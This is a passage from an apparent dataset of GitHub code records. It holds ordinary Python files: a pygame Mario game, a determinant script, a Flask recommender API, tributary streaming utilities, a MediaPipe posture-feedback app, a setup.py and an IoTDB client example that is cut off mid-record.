on_update(level, mario):\n    \"\"\"Handles positions and logic.\"\"\"\n    mario.update(level)\n    # Freeze updates while Mario has death animation/is respawning\n    if not mario.dead:\n        level.update(mario, mario.is_scrolling)\n        if mario.running:\n            level.update(mario, mario.is_scrolling, -mario.velocity.x)\n        else:\n            level.update(mario, mario.is_scrolling)\n\n\ndef on_draw(level, mario, game_time, player_score):\n    \"\"\"Displays all objects to screen.\"\"\"\n    level.background.draw()\n    # Draw Mario in front of flag pole and castle\n    if mario.settings.level_over or mario.dead:\n        level.draw()\n        mario.draw()\n        if not mario.level_2:\n            level.castle_layer.draw()\n    # Draw Mario behind pipes during animations\n    else:\n        mario.draw()\n        level.draw()\n    if mario.level_2:\n        mario.lifes.draw(True)\n        game_time.draw(True)\n        player_score.draw(True)\n        return\n    mario.lifes.draw(mario.underground)\n    game_time.draw(mario.underground)\n    player_score.draw(mario.underground)\n","repo_name":"ganzabeans/Super-Mario-Pygame","sub_path":"library/game_methods.py","file_name":"game_methods.py","file_ext":"py","file_size_in_byte":3161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26661666856","text":"import numpy as np\n\n# rule of sarrus for 3x3 matrix\n\ndef determinant(matrix):\n    a = matrix[0][0]\n    b = matrix[0][1]\n    c = matrix[0][2]\n    d = matrix[1][0]\n    e = matrix[1][1]\n    f = matrix[1][2]\n    g = matrix[2][0]\n    h = matrix[2][1]\n    i = matrix[2][2]\n    return a*e*i + b*f*g + c*d*h - c*e*g - b*d*i - a*f*h\n\nmatrix = [\n    \n    [2, -6, 3], \n    [2, -5, 3], \n    [0, 3, -1]\n\n    ]\n\nprint(determinant(matrix)) # Output: -2","repo_name":"nickschnee/linear-algebra","sub_path":"det_3x3.py","file_name":"det_3x3.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37915303376","text":"from demographic_filtering import output\r\nfrom content_filtering import get_recommendations\r\nfrom storage import all_articles, liked_articles, unliked_articles\r\nfrom flask import Flask, jsonify\r\nimport itertools\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route(\"/get-article\")\r\ndef get_article():\r\n    return jsonify({\r\n        \"data\": all_articles[0],\r\n        \"status\": \"Success\"\r\n    })\r\n\r\n@app.route(\"/liked-article\", methods=[\"POST\"])\r\ndef liked_article():\r\n    article = all_articles[0]\r\n    liked_articles.append(article)\r\n    all_articles.pop(0)\r\n\r\n    return ({\r\n        \"status\": \"Success\"\r\n    }), 201\r\n\r\n@app.route(\"/unliked-article\", methods=[\"POST\"])\r\ndef unliked_article():\r\n    article = all_articles[0]\r\n    unliked_articles.append(article)\r\n    all_articles.pop(0)\r\n\r\n    return ({\r\n        \"status\": \"Success\"\r\n    }), 201\r\n\r\n@app.route(\"/popular-articles\")\r\ndef popular_articles():\r\n    article_data = []\r\n    for article in output:\r\n        _d = {\r\n            \"title\": article[0],\r\n            \"lang\": article[1],\r\n            \"url\": article[2],\r\n            \"text\": article[3]\r\n        }\r\n\r\n        article_data.append(_d)\r\n\r\n    return jsonify({\r\n        \"data\": article_data,\r\n        \"status\": \"Success\"\r\n    }), 200\r\n\r\n@app.route(\"/recommended-articles\")\r\ndef recommended_articles():\r\n    all_recommend = []\r\n\r\n    for liked_article in liked_articles:\r\n        output = get_recommendations(liked_article[4])\r\n        for data in output:\r\n            all_recommend.append(data)\r\n\r\n    all_recommend.sort()\r\n    all_recommend = list(all_recommend for all_recommend, _ in itertools.groupby(all_recommend))\r\n\r\n    article_data = [] \r\n\r\n    for 
recommend in all_recommend:\r\n _d = {\r\n \"title\": recommend[0],\r\n \"lang\": recommend[1],\r\n \"url\": recommend[2],\r\n \"text\": recommend[3]\r\n }\r\n\r\n article_data.append(_d)\r\n\r\n return jsonify({\r\n \"data\": article_data,\r\n \"status\": \"Success\"\r\n }), 200\r\n\r\nif __name__ == \"__main__\":\r\n app.run()","repo_name":"Shaurya0802/C142-Project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20224873609","text":"import asyncio\nimport json as JSON\nimport os\nfrom .node import Node\nfrom ..base import StreamNone, StreamRepeat, StreamEnd, TributaryException\n\n\ndef Delay(node, delay=1):\n \"\"\"Streaming wrapper to delay a stream\n\n Arguments:\n node (node): input stream\n delay (float): time to delay input stream\n \"\"\"\n\n async def foo(val):\n await asyncio.sleep(delay)\n return val\n\n ret = Node(foo=foo, name=\"Delay\", inputs=1)\n node >> ret\n return ret\n\n\n# class State(Node):\n# '''Streaming wrapper to delay a stream\n\n# Arguments:\n# node (node): input stream\n# state (dict): state dictionary of values to hold\n# '''\n\n# def __init__(self, node, delay=1):\n# async def foo(val):\n# await asyncio.sleep(delay)\n# return val\n\n# super().__init__(foo=foo, foo_kwargs=None, name='Delay', inputs=1)\n# node.downstream().append((self, 0))\n# self.upstream().append(node)\n\n\ndef Apply(node, foo, foo_kwargs=None):\n \"\"\"Streaming wrapper to apply a function to an input stream\n\n Arguments:\n node (node): input stream\n foo (callable): function to apply\n foo_kwargs (dict): kwargs for function\n \"\"\"\n\n def _foo(val):\n return ret._apply(val, **ret._apply_kwargs)\n\n ret = Node(foo=_foo, name=\"Apply\", inputs=1)\n ret.set(\"_apply\", foo)\n ret.set(\"_apply_kwargs\", foo_kwargs or {})\n node >> ret\n return ret\n\n\ndef Window(node, size=-1, full_only=False):\n \"\"\"Streaming wrapper to collect a window of values\n\n Arguments:\n node (node): input stream\n size (int): size of windows to use\n full_only (bool): only return if list is full\n \"\"\"\n\n def foo(val, size=size, full_only=full_only):\n if size == 0:\n return val\n else:\n ret._accum.append(val)\n\n if size > 0:\n ret._accum = ret._accum[-size:]\n\n if full_only and len(ret._accum) == size:\n return ret._accum\n elif full_only:\n return StreamNone()\n else:\n return ret._accum\n\n ret = Node(foo=foo, name=\"Window[{}]\".format(size if size > 0 else \"∞\"), inputs=1)\n ret.set(\"_accum\", [])\n node >> ret\n return ret\n\n\ndef Unroll(node):\n \"\"\"Streaming wrapper to unroll an iterable stream. 
Similar to Curve\n\n Arguments:\n node (node): input stream\n \"\"\"\n\n async def foo(value):\n # unrolled\n if ret._count > 0:\n ret._count -= 1\n return value\n\n # unrolling\n try:\n for v in value:\n ret._count += 1\n await ret._push(v, 0)\n except TypeError:\n return value\n else:\n return StreamRepeat()\n\n ret = Node(foo=foo, name=\"Unroll\", inputs=1)\n ret.set(\"_count\", 0)\n node >> ret\n return ret\n\n\ndef UnrollDataFrame(node, json=False, wrap=False):\n \"\"\"Streaming wrapper to unroll a dataframe into a stream\n\n Arguments:\n node (node): input stream\n \"\"\"\n\n async def foo(value, json=json, wrap=wrap):\n # unrolled\n if ret._count > 0:\n ret._count -= 1\n return value\n\n # unrolling\n try:\n for i in range(len(value)):\n row = value.iloc[i]\n\n if json:\n data = row.to_dict()\n data[\"index\"] = row.name\n else:\n data = row\n ret._count += 1\n await ret._push(data, 0)\n\n except TypeError:\n return value\n else:\n return StreamRepeat()\n\n ret = Node(foo=foo, name=\"UnrollDF\", inputs=1)\n ret.set(\"_count\", 0)\n node >> ret\n return ret\n\n\ndef Merge(node1, node2):\n \"\"\"Streaming wrapper to merge 2 inputs into a single output\n\n Arguments:\n node1 (node): input stream\n node2 (node): input stream\n \"\"\"\n\n def foo(value1, value2):\n return value1, value2\n\n ret = Node(foo=foo, name=\"Merge\", inputs=2)\n node1 >> ret\n node2 >> ret\n return ret\n\n\ndef ListMerge(node1, node2):\n \"\"\"Streaming wrapper to merge 2 input lists into a single output list\n\n Arguments:\n node1 (node): input stream\n node2 (node): input stream\n \"\"\"\n\n def foo(value1, value2):\n return list(value1) + list(value2)\n\n ret = Node(foo=foo, name=\"ListMerge\", inputs=2)\n node1 >> ret\n node2 >> ret\n return ret\n\n\ndef DictMerge(node1, node2):\n \"\"\"Streaming wrapper to merge 2 input dicts into a single output dict.\n Preference is given to the second input (e.g. 
if keys overlap)\n\n Arguments:\n node1 (node): input stream\n node2 (node): input stream\n \"\"\"\n\n def foo(value1, value2):\n ret = {}\n ret.update(value1)\n ret.update(value2)\n return ret\n\n ret = Node(foo=foo, name=\"DictMerge\", inputs=2)\n node1 >> ret\n node2 >> ret\n return ret\n\n\ndef FixedMap(node, count, mapper=None):\n \"\"\"Streaming wrapper to split stream into a fixed number of outputs\n\n Arguments:\n node (Node): input stream\n count (int): number of output nodes to generate\n mapper (function): how to map the inputs into `count` streams\n \"\"\"\n rets = []\n\n def _default_mapper(value, i):\n return value[i]\n\n for _ in range(count):\n\n def foo(value, i=_, mapper=mapper or _default_mapper):\n return mapper(value, i)\n\n ret = Node(foo=foo, name=\"FixedMap\", inputs=1)\n node >> ret\n rets.append(ret)\n\n return rets\n\n\ndef Reduce(*nodes, reducer=None):\n \"\"\"Streaming wrapper to merge any number of inputs\n\n Arguments:\n nodes (tuple): input streams\n reducer (function): how to map the outputs into one stream\n \"\"\"\n\n def foo(*values, reducer=reducer):\n return values if reducer is None else reducer(*values)\n\n ret = Node(foo=foo, name=\"Reduce\", inputs=len(nodes))\n for i, n in enumerate(nodes):\n n >> ret\n return ret\n\n\ndef Subprocess(\n node, command, json=False, std_err=False, one_off=False, node_to_command=False\n):\n \"\"\"Open up a subprocess and yield the results as they come\n\n Args:\n node (Node): input stream\n command (str): command to run\n std_err (bool): include std_err\n \"\"\"\n if node_to_command and not one_off:\n raise TributaryException(\"Piping upstream values to command assumes one off\")\n\n async def _proc(value, command=command, std_err=std_err, one_off=one_off):\n if ret._proc is None:\n if node_to_command:\n command = command.format(value)\n\n proc = await asyncio.create_subprocess_shell(\n command,\n stdin=asyncio.subprocess.PIPE,\n stdout=asyncio.subprocess.PIPE,\n stderr=asyncio.subprocess.PIPE,\n )\n ret._proc = proc\n\n if one_off:\n stdout, stderr = await proc.communicate()\n\n if stdout:\n stdout = stdout.decode()\n if stderr:\n stderr = stderr.decode()\n\n ret._proc = None\n\n if std_err:\n return stdout, stderr\n else:\n return stdout\n\n else:\n if value == StreamEnd():\n try:\n ret._proc.terminate()\n ret._proc.kill()\n os.kill(ret._proc.pid)\n except ProcessLookupError:\n pass\n\n await ret._proc.wait()\n ret._proc = None\n\n if json:\n value = JSON.dumps(value)\n\n ret._proc.stdin.write(\"{}\\n\".format(value).encode(\"utf8\"))\n await ret._proc.stdin.drain()\n\n val = await asyncio.create_task(ret._proc.stdout.readline())\n val = val.decode().strip()\n\n if val == \"\":\n await ret._proc.wait()\n ret._proc = None\n return StreamEnd()\n\n if json:\n val = JSON.loads(val)\n return val\n\n ret = Node(foo=_proc, name=\"Proc\", inputs=1)\n ret.set(\"_proc\", None)\n node >> ret\n return ret\n\n\nNode.delay = Delay\n# Node.state = State\nNode.apply = Apply\nNode.window = Window\nNode.unroll = Unroll\nNode.unrollDataFrame = UnrollDataFrame\nNode.merge = Merge\nNode.listMerge = ListMerge\nNode.dictMerge = DictMerge\nNode.map = FixedMap\nNode.reduce = Reduce\nNode.proc = Subprocess\n","repo_name":"RajaPoseidon/tributary","sub_path":"tributary/streaming/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"7533127971","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[154]:\n\n\n# 0.a install 
Dependencies\n#----------------------------#\nget_ipython().system('pip install mediapipe opencv-python')\n\n\n# In[1]:\n\n\n#0.b import Dependencies\n#-----------------------------#\nimport cv2\nimport mediapipe as mp\nimport numpy as np #use for trig when calculating angles between kp's\nimport time\nmp_drawing = mp.solutions.drawing_utils #to draw poses\nmp_pose = mp.solutions.pose #imports 'pose' model from mediapipe\n\n\n# In[15]:\n\n\ncap = cv2.VideoCapture(0, cv2.CAP_DSHOW) #capture device\n\nfont = cv2.FONT_HERSHEY_DUPLEX\nred = (0,0,255)\ngreen = (0,255,0)\nblue = (243,247,0)\norange = (24,197,245)\n\ntimer = int(3)\n\n#scapula positioning variables\ncolor_scap, stage_scap, max_depression = blue, None, 0\n\n#hinge variables\ncolor_hinge, stage_hinge, eye_ear_level_angle = blue, None, 0\n\n#ASI variables\ncolor_asi, stage_asi, chin_down_nose_height = blue, None, 0\n \nwith mp_pose.Pose(min_detection_confidence=0.5, min_tracking_confidence=0.5) as pose:\n while cap.isOpened():\n ret,frame = cap.read()\n \n #mediapipe requires RGB\n image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n image.flags.writeable = False #saves memory\n \n #give results of detection\n results = pose.process(image)\n \n #Go back to BGR for cv\n image.flags.writeable = True\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n \n #Get KPs\n try:\n keypoints = results.pose_landmarks.landmark\n \n # Get coordinates for display\n r_shoulder = get_coordinates_of('r_shoulder') #relevant kp's for scapular height\n \n r_eye = get_coordinates_of('r_eye') #relevant kp's for neck hinge\n r_ear = get_coordinates_of('r_ear')\n \n nose = get_coordinates_of('nose') ##relevant kp's for atlantostyloid interval\n \n \n #RealTime Scapula Height calculation and display\n rshoulder_height = calculate_height_of(r_shoulder)\n\n cv2.putText(image, str(rshoulder_height), \n np.subtract(tuple(np.multiply(r_shoulder, [640, 480]).astype(int)),(10,10)), \n font, 0.6,(color_scap), 1, cv2.LINE_AA\n )\n \n\n \n #RealTime Horizon Level calculation and display\n r_eye_ear_angle = np.rint(calculate_angle(r_eye,r_ear,[r_ear[0],0]))\n\n cv2.putText(image, str(r_eye_ear_angle), \n np.subtract(tuple(np.multiply(r_ear, [640, 480]).astype(int)),(10,10)), \n font, 0.6,(color_hinge), 1, cv2.LINE_AA\n )\n \n #RealTime Nose Height calculation and display\n nose_height = calculate_height_of(nose)\n\n cv2.putText(image, str(nose_height), \n np.add(tuple(np.multiply(nose, [640, 480]).astype(int)),(10,10)), \n font, 0.5,(color_asi), 1, cv2.LINE_AA\n )\n \n #Header for Ideal Threshold Values:\n if max_depression != 0 or eye_ear_level_angle != 0 or chin_down_nose_height != 0:\n \n cv2.putText(image, \"Ideal Ranges\", \n (490,50), \n font, 0.65,green, 1, cv2.LINE_AA\n )\n\n\n#-------------------SCAPULA----------------------------------#\n\n capkey_scap = cv2.waitKey(10)\n if capkey_scap == ord('s'):\n prev = time.time()\n\n\n while timer >=0:\n ret,image = cap.read()\n \n cv2.putText(image, str(timer),\n (300,240), \n font,7, (255,0, 0), 4, cv2.LINE_AA)\n cv2.imshow('SPROJ Cam Feed', image)\n \n cv2.putText(image, \"Put Scapula in Maximal Depression\",\n (30,50), \n font,1, (255,0, 0), 4, cv2.LINE_AA)\n \n cv2.imshow('SPROJ Cam Feed', image) \n cv2.waitKey(1)\n \n cur = time.time()\n \n if cur-prev >=1:\n prev = cur\n timer = timer-1\n \n else:\n ret,image = cap.read()\n cv2.imshow('SPROJ Cam Feed', image)\n \n results = pose.process(image)\n keypoints = results.pose_landmarks.landmark\n r_shoulder = get_coordinates_of('r_shoulder')\n \n cv2.waitKey(1000) \n timer = 
int(3)\n max_depression = calculate_height_of(r_shoulder)\n \n \n\n if max_depression != 0:\n \n #Header\n cv2.putText(image,'Scapula:', \n (330,80), \n font, 0.55,color_scap, 1, cv2.LINE_AA\n )\n #Ideal Range\n cv2.putText(image,\"< \"+ str(max_depression - 5), \n (500,80), \n font, 0.55,color_scap, 1, cv2.LINE_AA\n )\n \n #scapular threshold ranges\n if rshoulder_height > max_depression - 5:\n stage_scap = \"Too Low\"\n color_scap = red\n else:\n stage_scap = \"Adequate Height\"\n color_scap = green\n else:\n stage_scap = \"Not Yet Calibrated\"\n color_scap = blue\n \n \n #Scapular threshold displays\n \n #Header\n cv2.putText(image, \"Scapular Height Status:\", \n (10,370), \n font, 0.7,(color_scap), 1, cv2.LINE_AA\n )\n #Status\n cv2.putText(image,stage_scap, \n (330,370), \n font, 0.7,(color_scap), 1, cv2.LINE_AA\n )\n \n \n#-----------------END--SCAPULA--------------------------------------#\n#-----------------CERVICAL HINGE------------------------------------#\n\n \n capkey = cv2.waitKey(10)\n if capkey == ord('n'):\n prev = time.time()\n \n while timer >=0:\n ret,image = cap.read()\n \n cv2.putText(image, \"Lift Back of Head Towards Ceiling\",\n (30,50), \n font,1, (255,0, 0), 4, cv2.LINE_AA)\n \n cv2.putText(image, str(timer),\n (320,240), \n font,7, (255,0, 0), 4, cv2.LINE_AA)\n cv2.imshow('SPROJ Cam Feed', image)\n cv2.waitKey(1)\n \n cur = time.time()\n \n if cur-prev >=1:\n prev = cur\n timer = timer-1\n \n else:\n ret,image = cap.read()\n cv2.imshow('SPROJ Cam Feed', image)\n \n results = pose.process(image)\n keypoints = results.pose_landmarks.landmark\n r_eye = get_coordinates_of('r_eye')\n r_ear = get_coordinates_of('r_ear')\n nose = get_coordinates_of('nose')\n \n cv2.waitKey(1000) \n timer = int(3)\n eye_ear_level_angle = np.rint(calculate_angle(r_eye,r_ear,[r_ear[0],0]))\n chin_down_nose_height = calculate_height_of(nose)\n \n \n \n \n #hinge threshold ranges\n\n if eye_ear_level_angle != 0:\n \n #Header\n cv2.putText(image,'Eye-Ear Level:', \n (330,110), \n font, 0.55,color_hinge, 1, cv2.LINE_AA\n )\n #Ideal Range\n cv2.putText(image,str(eye_ear_level_angle - 12) + ' - ' + str(eye_ear_level_angle + 8), \n (500,110), \n font, 0.55,color_hinge, 1, cv2.LINE_AA\n )\n \n if eye_ear_level_angle > 110 or eye_ear_level_angle < 70:\n stage_hinge = \"Bad Calibration, Try Again\"\n color_hinge = blue\n \n elif r_eye_ear_angle > eye_ear_level_angle + 8:\n stage_hinge = \"Overly Tucking Chin\"\n color_hinge = red\n #hinging is granted 4 degrees of freedom because a slight change is inevitable when \n #raising chin to increase ASI\n elif r_eye_ear_angle < eye_ear_level_angle - 12:\n stage_hinge = \"Hinging\"\n color_hinge = red\n \n elif stage_asi == \"May Be Slightly Hinging\" and stage_hinge != \"Hinging\":\n stage_hinge = stage_asi\n color_hinge = orange\n \n elif (r_eye_ear_angle <= eye_ear_level_angle + 8) and (r_eye_ear_angle >= eye_ear_level_angle - 12):\n stage_hinge = \"Adequate Position\"\n color_hinge = green\n \n else:\n stage_hinge = \"Not Yet Calibrated\"\n color_hinge = blue\n \n\n \n # Hinge threshold display\n cv2.putText(image,\"Cervical Hinge Status:\", \n (10,400), \n font, 0.7,(color_hinge), 1, cv2.LINE_AA\n )\n\n cv2.putText(image,stage_hinge, \n (330,400), \n font, 0.7,(color_hinge), 1, cv2.LINE_AA\n )\n \n \n \n\n#-----------------END CERVICAL HINGE---------------#\n\n#--------------- ATLANTOSTYLOID INTERVAL------------#\n \n#ASI is measured through the height of the nose keypoint AFTER properly eliminating hinge;they are closely related\n#Therefore, ASI does 
not need it's own calibration.\n\n\n\n\n #ASI threshold ranges\n if chin_down_nose_height != 0:\n \n #Header\n cv2.putText(image,'Nose Height:', \n (330,140), \n font, 0.55,(color_asi), 1, cv2.LINE_AA\n )\n #Ideal Range\n cv2.putText(image,str(chin_down_nose_height - 12) + \" - \"+ str(chin_down_nose_height - 5), \n (500,140), \n font, 0.55,(color_asi), 1, cv2.LINE_AA\n )\n \n \n if stage_hinge == \"Bad Calibration, Try Again\":\n chin_down_nose_height = 0\n \n \n elif stage_hinge == \"Hinging\":\n stage_asi = stage_hinge\n color_asi = red\n \n elif stage_hinge == \"Overly Tucking Chin\":\n stage_asi = stage_hinge\n color_asi = red\n \n \n elif nose_height >= chin_down_nose_height and stage_hinge != \"Overly Tucking Chin\":\n stage_asi = \"Gently Raise Chin\"\n color_asi = orange\n \n #10 pixels of freedom for adequate interval or until hinge occurs\n elif nose_height < chin_down_nose_height - 15 and stage_hinge != \"Hinging\":\n stage_asi = \"May Be Slightly Hinging\"\n color_asi = orange\n \n elif (nose_height <= chin_down_nose_height - 5) and (nose_height >= chin_down_nose_height - 15):\n stage_asi = \"Adequate Interval\"\n color_asi = green\n \n else:\n stage_asi = \"Not Yet Calibrated\"\n color_asi = blue\n \n \n #ASI threshold display\n cv2.putText(image, \"ASI Status:\", \n (10,430), \n font, 0.7,(color_asi), 1, cv2.LINE_AA\n ) \n\n cv2.putText(image, stage_asi, \n (330,430), \n font, 0.7,(color_asi), 1, cv2.LINE_AA\n )\n \n except:\n pass\n \n \n #Render detections - pass image, kp's, and limbs between kp's\n mp_drawing.draw_landmarks(image, results.pose_landmarks, mp_pose.POSE_CONNECTIONS)\n \n cv2.imshow('SPROJ Cam Feed', image)\n \n #Exit Program\n exitkey = cv2.waitKey(10) & 0xFF\n if exitkey == ord('q'):\n break\n \n cap.release()\n cv2.destroyAllWindows()\n\n\n# In[3]:\n\n\ndef calculate_angle(a,b,c):\n a = np.array(a)\n b = np.array(b)\n c = np.array(c)\n \n radians = np.arctan2(c[1]-b[1], c[0]-b[0]) - np.arctan2(a[1]-b[1], a[0]-b[0])\n angle = np.abs(radians*180.0/np.pi)\n \n return angle\n\n\n# In[4]:\n\n\ndef calculate_height_of(a):\n ycoord = a[1]\n height = np.rint(ycoord*480)\n return height\n\n\n# In[5]:\n\n\nkeypoint_IDs = {\n 'nose':0,\n 'r_eye':3,\n 'r_ear':8,\n 'r_shoulder':12\n}\n\n\n# In[6]:\n\n\ndef get_coordinates_of(keypoint: str):\n return[keypoints[keypoint_IDs[keypoint]].x,keypoints[keypoint_IDs[keypoint]].y]\n\n\n# In[155]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"marco-scanni/SPROJ-Code","sub_path":"SP-Scanni-FullCode.py","file_name":"SP-Scanni-FullCode.py","file_ext":"py","file_size_in_byte":14155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10970068489","text":"from setuptools import setup\nimport re\n\n__version__ = re.findall(r\"\"\"__version__ = [\"']+([0-9\\.]*)[\"']+\"\"\", open(\"RRAlinter/__init__.py\").read())[0]\n\nsetup(\n name=\"RRA-linter\",\n version=__version__,\n description=\"RRA-linter is a linter for manuscripts .tex files used to identify common issues in writing.\",\n keywords=\"latex\",\n author=\"\",\n author_email=\"\",\n url=\"https://github.com/mdolab/r\",\n # license=\"Apache 2.0\",\n packages=[\"RRAlinter\"],\n # package_data={\"cgnsutilities\": [\"*.so\"]},\n # install_requires=[\"numpy>=1.16\"],\n # classifiers=[\"Operating System :: Linux\", \"Programming Language :: Python, Fortran\"],\n entry_points={\"console_scripts\": [\"RRAlint = 
RRAlinter.linter:main\"]},\n)\n","repo_name":"joanibal/RRAlinter","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4339081144","text":"import numpy as np\n\nfrom iotdb.Session import Session\nfrom iotdb.template.MeasurementNode import MeasurementNode\nfrom iotdb.template.Template import Template\nfrom iotdb.utils.BitMap import BitMap\nfrom iotdb.utils.IoTDBConstants import TSDataType, TSEncoding, Compressor\nfrom iotdb.utils.Tablet import Tablet\nfrom iotdb.utils.NumpyTablet import NumpyTablet\n\n# creating session connection.\nip = \"127.0.0.1\"\nport_ = \"6667\"\nusername_ = \"root\"\npassword_ = \"root\"\n# session = Session(ip, port_, username_, password_, fetch_size=1024, zone_id=\"UTC+8\", enable_redirection=True)\nsession = Session.init_from_node_urls(\n node_urls=[\"127.0.0.1:6667\", \"127.0.0.1:6668\", \"127.0.0.1:6669\"],\n user=\"root\",\n password=\"root\",\n fetch_size=1024,\n zone_id=\"UTC+8\",\n enable_redirection=True,\n)\nsession.open(False)\n\n# create and delete databases\nsession.set_storage_group(\"root.sg_test_01\")\nsession.set_storage_group(\"root.sg_test_02\")\nsession.set_storage_group(\"root.sg_test_03\")\nsession.set_storage_group(\"root.sg_test_04\")\nsession.delete_storage_group(\"root.sg_test_02\")\nsession.delete_storage_groups([\"root.sg_test_03\", \"root.sg_test_04\"])\n\n# setting time series.\nsession.create_time_series(\n \"root.sg_test_01.d_01.s_01\", TSDataType.BOOLEAN, TSEncoding.PLAIN, Compressor.SNAPPY\n)\nsession.create_time_series(\n \"root.sg_test_01.d_01.s_02\", TSDataType.INT32, TSEncoding.PLAIN, Compressor.SNAPPY\n)\nsession.create_time_series(\n \"root.sg_test_01.d_01.s_03\", TSDataType.INT64, TSEncoding.PLAIN, Compressor.SNAPPY\n)\nsession.create_time_series(\n \"root.sg_test_01.d_02.s_01\",\n TSDataType.BOOLEAN,\n TSEncoding.PLAIN,\n Compressor.SNAPPY,\n None,\n {\"tag1\": \"v1\"},\n {\"description\": \"v1\"},\n \"temperature\",\n)\n\n# setting multiple time series once.\nts_path_lst_ = [\n \"root.sg_test_01.d_01.s_04\",\n \"root.sg_test_01.d_01.s_05\",\n \"root.sg_test_01.d_01.s_06\",\n \"root.sg_test_01.d_01.s_07\",\n \"root.sg_test_01.d_01.s_08\",\n \"root.sg_test_01.d_01.s_09\",\n]\ndata_type_lst_ = [\n TSDataType.FLOAT,\n TSDataType.DOUBLE,\n TSDataType.TEXT,\n TSDataType.FLOAT,\n TSDataType.DOUBLE,\n TSDataType.TEXT,\n]\nencoding_lst_ = [TSEncoding.PLAIN for _ in range(len(data_type_lst_))]\ncompressor_lst_ = [Compressor.SNAPPY for _ in range(len(data_type_lst_))]\nsession.create_multi_time_series(\n ts_path_lst_, data_type_lst_, encoding_lst_, compressor_lst_\n)\n\nts_path_lst_ = [\n \"root.sg_test_01.d_02.s_04\",\n \"root.sg_test_01.d_02.s_05\",\n \"root.sg_test_01.d_02.s_06\",\n \"root.sg_test_01.d_02.s_07\",\n \"root.sg_test_01.d_02.s_08\",\n \"root.sg_test_01.d_02.s_09\",\n]\ndata_type_lst_ = [\n TSDataType.FLOAT,\n TSDataType.DOUBLE,\n TSDataType.TEXT,\n TSDataType.FLOAT,\n TSDataType.DOUBLE,\n TSDataType.TEXT,\n]\nencoding_lst_ = [TSEncoding.PLAIN for _ in range(len(data_type_lst_))]\ncompressor_lst_ = [Compressor.SNAPPY for _ in range(len(data_type_lst_))]\ntags_lst_ = [{\"tag2\": \"v2\"} for _ in range(len(data_type_lst_))]\nattributes_lst_ = [{\"description\": \"v2\"} for _ in range(len(data_type_lst_))]\nsession.create_multi_time_series(\n ts_path_lst_,\n data_type_lst_,\n encoding_lst_,\n compressor_lst_,\n None,\n tags_lst_,\n attributes_lst_,\n None,\n)\n\n# delete time 
series\nsession.delete_time_series(\n [\n \"root.sg_test_01.d_01.s_07\",\n \"root.sg_test_01.d_01.s_08\",\n \"root.sg_test_01.d_01.s_09\",\n ]\n)\n\n# checking time series\nprint(\n \"s_07 expecting False, checking result: \",\n session.check_time_series_exists(\"root.sg_test_01.d_01.s_07\"),\n)\nprint(\n \"s_03 expecting True, checking result: \",\n session.check_time_series_exists(\"root.sg_test_01.d_01.s_03\"),\n)\nprint(\n \"d_02.s_01 expecting True, checking result: \",\n session.check_time_series_exists(\"root.sg_test_01.d_02.s_01\"),\n)\nprint(\n \"d_02.s_06 expecting True, checking result: \",\n session.check_time_series_exists(\"root.sg_test_01.d_02.s_06\"),\n)\n\n# insert one record into the database.\nmeasurements_ = [\"s_01\", \"s_02\", \"s_03\", \"s_04\", \"s_05\", \"s_06\"]\nvalues_ = [False, 10, 11, 1.1, 10011.1, \"test_record\"]\ndata_types_ = [\n TSDataType.BOOLEAN,\n TSDataType.INT32,\n TSDataType.INT64,\n TSDataType.FLOAT,\n TSDataType.DOUBLE,\n TSDataType.TEXT,\n]\nsession.insert_record(\"root.sg_test_01.d_01\", 1, measurements_, data_types_, values_)\n\n# insert multiple records into database\nmeasurements_list_ = [\n [\"s_01\", \"s_02\", \"s_03\", \"s_04\", \"s_05\", \"s_06\"],\n [\"s_01\", \"s_02\", \"s_03\", \"s_04\", \"s_05\", \"s_06\"],\n]\nvalues_list_ = [\n [False, 22, 33, 4.4, 55.1, \"test_records01\"],\n [True, 77, 88, 1.25, 8.125, bytes(\"test_records02\", \"utf-8\")],\n]\ndata_type_list_ = [data_types_, data_types_]\ndevice_ids_ = [\"root.sg_test_01.d_01\", \"root.sg_test_01.d_01\"]\nsession.insert_records(\n device_ids_, [2, 3], measurements_list_, data_type_list_, values_list_\n)\n\n# insert one tablet into the database.\nvalues_ = [\n [False, 10, 11, 1.1, 10011.1, \"test01\"],\n [True, 100, 11111, 1.25, 101.0, \"test02\"],\n [False, 100, 1, 188.1, 688.25, \"test03\"],\n [True, 0, 0, 0, 6.25, \"test04\"],\n] # Non-ASCII text will cause error since bytes can only hold 0-128 nums.\ntimestamps_ = [4, 5, 6, 7]\ntablet_ = Tablet(\n \"root.sg_test_01.d_01\", measurements_, data_types_, values_, timestamps_\n)\nsession.insert_tablet(tablet_)\n\n# insert one numpy tablet into the database.\nnp_values_ = [\n np.array([False, True, False, True], TSDataType.BOOLEAN.np_dtype()),\n np.array([10, 100, 100, 0], TSDataType.INT32.np_dtype()),\n np.array([11, 11111, 1, 0], TSDataType.INT64.np_dtype()),\n np.array([1.1, 1.25, 188.1, 0], TSDataType.FLOAT.np_dtype()),\n np.array([10011.1, 101.0, 688.25, 6.25], TSDataType.DOUBLE.np_dtype()),\n np.array([\"test01\", \"test02\", \"test03\", \"test04\"], TSDataType.TEXT.np_dtype()),\n]\nnp_timestamps_ = np.array([1, 2, 3, 4], TSDataType.INT64.np_dtype())\nnp_tablet_ = NumpyTablet(\n \"root.sg_test_01.d_02\", measurements_, data_types_, np_values_, np_timestamps_\n)\nsession.insert_tablet(np_tablet_)\n\n# insert one unsorted numpy tablet into the database.\nnp_values_unsorted = [\n np.array([False, False, False, True, True], np.dtype(\">?\")),\n np.array([0, 